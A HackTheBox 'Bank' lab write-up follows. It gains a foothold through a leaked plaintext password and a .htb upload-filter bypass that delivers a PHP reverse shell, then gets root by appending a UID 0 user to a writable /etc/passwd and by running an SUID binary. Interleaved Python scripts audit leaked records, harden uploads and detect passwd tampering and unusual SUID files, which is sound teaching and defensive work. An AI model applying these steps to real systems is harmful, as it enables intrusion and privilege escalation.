HTB: Bank
Summary
Bank was a fun machine that revolved around the theme of hacking into a bank. You begin by running gobuster against a virtual host name which is hosting a different web server than the one on the IP address. You then find a number of files that are bank account transactions, which you download and grep for "password", and find that for one of the files the encryption failed so a plaintext password for the user purplerabbit is visible, which you then use to access the web service. From the web service you see an upload feature whose blacklist rejects any file that isn't an image file extension. Perhaps the hardest part of the machine was knowing to view the source code of the support page, which told you that the administrator has allowed .htb to execute as PHP; you then upload a PHP reverse shell with the file extension .htb and get a shell as www-data. The priv esc was very straightforward and involved a writable /etc/passwd file. So without further ado, let's get into Bank from HackTheBox.
Recon
$cat nmap/initial
# Nmap 7.91 scan initiated Fri May 21 18:38:01 2021 as: nmap -A -oN nmap/initial -vvv 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up, received syn-ack (0.023s latency).
Scanned at 2021-05-21 18:38:02 BST for 15s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
| 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open domain syn-ack ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 21 18:38:17 2021 -- 1 IP address (1 host up) scanned in 15.67 seconds
Then I scanned for all open ports on the machine:
$nmap -p- --min-rate 1000 -oN nmap/all-ports $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 08:54 BST
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.078s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
Enumeration of Services
HTTP 80
The first thing I did was add bank.htb to my /etc/hosts file, as this is normally the naming convention for HackTheBox machines. Next I ran gobuster against the IP address and again against bank.htb. I didn't receive anything of interest from the web server at the IP address, but I did receive some interesting directories for the virtual host name:
$cat gobuster-main-bank.txt
/uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/support.php (Status: 302) [Size: 3291] [--> login.php]
/login.php (Status: 200) [Size: 1974]
/assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/index.php (Status: 302) [Size: 7322] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
Taking a look at http://bank.htb/balance-transfer/ just shows a bunch of files with hashes as their names and .acc at the end of the file names. Looking into one of these files shows that the username and password of the account are encrypted:
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: st62N4vDC2U6fPplbkRXVx6kYot9hDTJ7ZLV4hzHjtNyjcTuwLsrjzMhXgrfTkY1kKWo1v5lZSTi5NMByf3ROQ9L6A00VZ1fKYDLtJ6sC0LHNyjmNndBdmnkXolSnn77
Email: lLTPu0i703OOC8apwo0KKo4IMqB9OIh9ubZZbh6clV0X4amAynkjMp2yQDIEmZNQaNQm4XyqSznXJKyi8SCUiEt8hbMDbAumnkIshhSaQg8A1GTayv5RayZrJM5VmAhK
Password: UZcch5n7mvIobByJ7EAhcAJWmORJp8tj8FwpLTx7ogvzR4jZIUgVuZRQOJzdR3x0J3quXYCle8U6de5V8lRClItar3oj6VkQZLkWJXiY5d4iraezw5cROG2gJqAQmUGl
CreditCards: 4
Transactions: 4
Balance: 3006892 .
===UserAccount===
Going over to /login.php gives a login screen which I tried to enumerate for SQL injection, but there doesn't appear to be any, and trying some basic credentials such as admin:admin didn't work.
Shell as www-data
So after looking at the other directories and not getting anywhere, I decided to go back and take a look at /balance-transfer, and did a recursive wget to download all the files in that directory.
$wget -r http://bank.htb/balance-transfer/
Next I did a grep search through the Password field of all the files and found a plaintext password.
$grep -R -i password
--snipped--
cc4b31bcc18c5883483f418ace7032cb.acc:Password: geSCR0aOIiQy5IOjjciLhiegu8RJvPzM3roVszKbRAKXjygCLzn2RCjmKa5g0F247r0A0KMRkwOD54gRDDUvgdR0oXgoDjtLKtlKe8CzFqcKvsC96wEmJwn7uEw7X0SH
68576f20e9732f1b2edc4df5b8533230.acc:Password: !##HTBB4nkP4ssw0rd!##
4e7da1c5f107c306f55bee851108c402.acc:Password: v0DRlNfbtg7pL0tCMBg4J2PZFr8N1AmxBZpWNF8gVgGHgaj2Mz7vCXvioD5qesXQrnNe2VvXcbFsmYv8yCDbA8tYMyp10nRsKEHMAdKMopeKoJSWmw7WFAVr9ksaHkDr
--snipped--
Looking inside the file showed that it was for the user purplerabbit.
$cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: purplerabbittos purplerabbittopoulos
Email: purplerabbit@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
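The report format above is simple enough to parse, and a defender who owns such an export directory would want to find the failed-encryption records before anyone else greps for them. The following is an added example, not code from the writeup or from the Bank box: it parses records in this format, flags any whose header reports a failed encryption, and additionally flags any whose Password field does not look like the 128-character alphanumeric blob the successful records contain (so a record with a misleading "++OK" header is still caught). The file names and encrypted values in SAMPLE_REPORTS are constructed; the purplerabbit record is the one quoted in the writeup.

```python
"""Audit .acc bank reports for records whose Password field is plaintext.

Added example (not the writeup's or the box's code). The report builder
and SAMPLE_REPORTS are constructed test data in the format shown above.
"""
from pathlib import Path

# 128 alphanumeric characters, the shape of the encrypted fields (constructed).
ENC_BLOB = "Qz7" * 42 + "xy"


def report(status, name, email, password):
    """Build one report in the on-disk format (helper for constructed samples)."""
    return (f"{status}\n+=================+\n| HTB Bank Report |\n+=================+\n"
            f"===UserAccount===\nFull Name: {name}\nEmail: {email}\nPassword: {password}\n"
            "CreditCards: 4\nTransactions: 4\nBalance: 3006892 .\n===UserAccount===\n")


# Constructed stand-in for a directory of .acc files.
SAMPLE_REPORTS = {
    "00aa.acc": report("++OK ENCRYPT SUCCESS", ENC_BLOB, ENC_BLOB, ENC_BLOB),
    "68576f20e9732f1b2edc4df5b8533230.acc": report(
        "--ERR ENCRYPT FAILED", "purplerabbittos purplerabbittopoulos",
        "purplerabbit@bank.htb", "!##HTBB4nkP4ssw0rd!##"),
    # Header claims success but the Password is clearly not an encrypted blob.
    "00bb.acc": report("++OK ENCRYPT SUCCESS", ENC_BLOB, ENC_BLOB, "hunter2"),
}


def parse_report(text):
    """Return the status header and the 'Key: value' fields of one report."""
    lines = text.splitlines()
    status = lines[0].strip() if lines else ""
    fields = {}
    for line in lines[1:]:
        if ":" not in line:  # decoration lines (+===+, |...|, ===UserAccount===)
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return {"status": status, "encrypted_header": status.startswith("++OK"), "fields": fields}


def looks_encrypted(value):
    """Successful records store a 128-char alphanumeric blob in each field."""
    return len(value) == 128 and value.isalnum()


def mask(secret):
    """Never put the recovered secret itself in an audit report."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def audit_reports(reports):
    """reports: {file name: file text}. Returns one finding per leaking record."""
    findings = []
    for name, text in reports.items():
        rec = parse_report(text)
        password = rec["fields"].get("Password", "")
        if not rec["encrypted_header"]:
            reason = f"header reports failure: {rec['status']}"
        elif not looks_encrypted(password):
            reason = "Password field is not a 128-char encrypted blob"
        else:
            continue
        findings.append({"file": name, "email": rec["fields"].get("Email", ""),
                         "reason": reason, "password_preview": mask(password)})
    return findings


def audit_directory(path):
    """Run the audit over every *.acc file under a real directory."""
    files = {p.name: p.read_text(errors="replace") for p in Path(path).glob("*.acc")}
    return audit_reports(files)


if __name__ == "__main__":
    for f in audit_reports(SAMPLE_REPORTS):
        print(f"{f['file']}: {f['reason']} ({f['email']}, {f['password_preview']})")
```

Point `audit_directory` at the downloaded balance-transfer folder to run it over the real export; the masked preview is enough to identify which record needs rotating without copying the password into the audit output.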
Next I tried logging into SSH with these creds but got access denied, so I then tried them on the login page and managed to authenticate to the web service.
Next I enumerated the web service I now had access to and found that there was an upload function in the support ticket section.
I then spent a little while fuzzing the upload section: it was applying a blacklist to any file that wasn't an image file extension. After spending some time fuzzing I came to a halt, viewed the page source and found a comment in /support.php which read
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
So then I simply renamed my php-reverse-shell.php file to have a .htb file extension to bypass the filter and was able to get a reverse shell as the www-data user.
$nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.16.91] from bank.htb [10.10.10.29] 40636
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
11:52:22 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
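The upload filter failed because it was a blacklist: any extension the server maps to the PHP handler but which the application forgot to list goes straight through. As an added example (not the Bank application's code, which is PHP; this is Python for illustration), the block below places the blacklist pattern from the box beside an allowlist check that also requires a single extension, verifies the file's magic bytes against the claimed type, and regenerates the stored file name. The BLACKLIST contents and the function names are assumptions modelled on the writeup, not the real filter.

```python
"""Extension blacklist (bypassed on the box) vs. allowlist + content check.

Added example, not the application's own code. BLACKLIST is an assumed
reconstruction of the kind of filter the writeup describes.
"""
import os
import secrets

# Assumed shape of the original filter: reject a few known-bad suffixes only.
BLACKLIST = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Hardened filter: accept only these, and only when the content agrees.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def blacklist_accepts(filename):
    """Vulnerable pattern: anything not explicitly listed is allowed, so an
    extension the web server also executes as PHP (.htb on the box) passes."""
    return os.path.splitext(filename.lower())[1] not in BLACKLIST


def allowlist_accepts(filename, content):
    """Hardened check: exactly one extension, from the allowlist, and the
    first bytes of the content must match that image type."""
    base = os.path.basename(filename).lower()
    if "\x00" in base or base.count(".") != 1:   # no double extensions, no NUL tricks
        return False
    ext = os.path.splitext(base)[1]
    if ext not in ALLOWLIST:
        return False
    return content.startswith(MAGIC[ext])


def validate_upload(filename, content):
    """Return (True, stored_name) or (False, reason). The stored name is
    random and carries only the validated extension, so the client-supplied
    name never reaches the filesystem."""
    if not allowlist_accepts(filename, content):
        return False, "only single-extension PNG/JPEG/GIF files whose content matches are accepted"
    ext = os.path.splitext(filename.lower())[1]
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    png = MAGIC[".png"] + b"\x00" * 16
    for name, data in [("shell.htb", b"<?php echo 'x';"), ("photo.png", png),
                       ("photo.php.png", png), ("fake.png", b"<?php echo 'x';")]:
        print(f"{name:14} blacklist={blacklist_accepts(name)!s:5} "
              f"allowlist={allowlist_accepts(name, data)}")
```

The single-extension rule also rejects legitimate names like my.photo.png; that is the intended trade-off, because the stored name is regenerated anyway and the original is never needed for serving the file. The web server side still needs a matching fix (no handler for non-standard extensions in the upload directory), which the content check above does not replace.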
I was then able to cat user.txt from purplerabbit’s home directory as this user.
www-data => Root
Next I saw a MySQL password, but it didn't lead anywhere, and after spending some time enumerating the MySQL database and getting nowhere with the passwords in it, I moved on.
I ran linpeas against the machine and it found that /etc/passwd was writable.
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/etc/passwd
I then added a root2 user with the password evil:
echo root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash >> /etc/passwd
and then ran su root2, entered the password evil, and got access to the machine as root:
root@bank:/home/purplerabbit# id
uid=0(root) gid=0(root) groups=0(root)
root@bank:/home/purplerabbit# whoami
root
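A writable /etc/passwd is trivial to spot with a permission check, but the resulting entry (a second UID 0 account carrying its own password hash, so /etc/shadow is never consulted) is just as easy to detect in the file's contents. The following is an added example, not code from the writeup or linpeas: it parses passwd-format text, flags extra UID 0 accounts and entries whose password field holds a hash rather than the shadow placeholder, and exposes the mode check separately so it can be run against any path. SAMPLE_PASSWD is constructed apart from the root2 line, which is the one the writeup appends.

```python
"""Audit passwd-format content for the tampering pattern shown above.

Added example, not from the writeup or any tool it uses. SAMPLE_PASSWD is
constructed; only the root2 line is taken from the writeup.
"""
import os
import stat

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
purplerabbit:x:1000:1000:purplerabbit,,,:/home/purplerabbit:/bin/bash
root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash
"""

# Values that mean "no usable hash here": shadow placeholder or locked account.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Yield one dict per line; malformed lines are kept and marked."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            entries.append({"line": n, "malformed": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = parts
        entries.append({"line": n, "name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return (line number, description) for every suspicious entry."""
    findings = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["line"], "malformed entry"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], f"extra UID 0 account: {e['name']}"))
        if e["pw"] not in SHADOW_PLACEHOLDERS:
            findings.append((e["line"], f"password hash stored in passwd, bypassing shadow: {e['name']}"))
    return findings


def mode_is_world_writable(mode):
    """True if the 'other' write bit is set in a st_mode value."""
    return bool(mode & stat.S_IWOTH)


def file_world_writable(path):
    """The permission problem linpeas reported, checked directly."""
    return mode_is_world_writable(os.stat(path).st_mode)


if __name__ == "__main__":
    for line, desc in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {desc}")
    for path in ("/etc/passwd", "/etc/shadow"):
        if os.path.exists(path):
            print(f"{path} world-writable: {file_world_writable(path)}")
```

Run `audit_passwd(open('/etc/passwd').read())` on a live host; a correct system produces no findings, and the two messages for the root2 line show why the appended entry works without touching /etc/shadow.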
There was also another way to priv esc on this machine which for some reason linpeas didn't find, and it involved an SUID file that instantly gives a root shell:
www-data@bank:/tmp$ find / -type f -user root -perm -4000 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
www-data@bank:/tmp$ /var/htb/bin/emergency
# whoami
root
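Every path in that listing except /var/htb/bin/emergency is a standard Ubuntu SUID binary, which is exactly the kind of difference a baseline comparison surfaces. As an added example (not from the writeup or from linpeas), the block below parses the output of that find command, compares it with a baseline set, and separately flags SUID files that live outside the usual system directories, so an unexpected binary is reported even when no baseline exists. FIND_OUTPUT is the listing from the writeup; SUID_BASELINE is an assumption built from the remainder of that listing, standing in for a list captured on a clean reference install.

```python
"""Compare a host's SUID binaries against a baseline and a location heuristic.

Added example, not code from the writeup. FIND_OUTPUT is the writeup's
listing; SUID_BASELINE is an assumed stand-in for a clean-install baseline.
"""

FIND_OUTPUT = """/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
"""

# Assumed baseline: what the same find would print on a clean install.
SUID_BASELINE = {
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/pkexec",
    "/usr/bin/newgrp", "/usr/bin/traceroute6.iputils", "/usr/bin/gpasswd",
    "/usr/bin/sudo", "/usr/bin/mtr", "/usr/sbin/pppd", "/bin/ping",
    "/bin/ping6", "/bin/su", "/bin/fusermount", "/bin/mount", "/bin/umount",
}

# Directories where package-managed SUID binaries normally live.
SYSTEM_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def parse_find_output(text):
    """Keep only absolute paths; drop blanks and 'Permission denied' noise."""
    return [line.strip() for line in text.splitlines() if line.strip().startswith("/")]


def audit_suid(found, baseline=SUID_BASELINE):
    """Return the three differences an analyst wants: new binaries, binaries
    in odd locations, and baseline binaries that have disappeared."""
    found = set(found)
    return {
        "not_in_baseline": sorted(found - baseline),
        "outside_system_dirs": sorted(p for p in found if not p.startswith(SYSTEM_PREFIXES)),
        "missing_from_baseline": sorted(baseline - found),
    }


if __name__ == "__main__":
    result = audit_suid(parse_find_output(FIND_OUTPUT))
    for key, paths in result.items():
        print(f"{key}: {paths or 'none'}")
```

On a fleet, the baseline is captured once per image with the same find command and stored with the image; the location heuristic catches the case where no baseline has been recorded yet.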
That was bank from hackthebox! Hope that you enjoyed!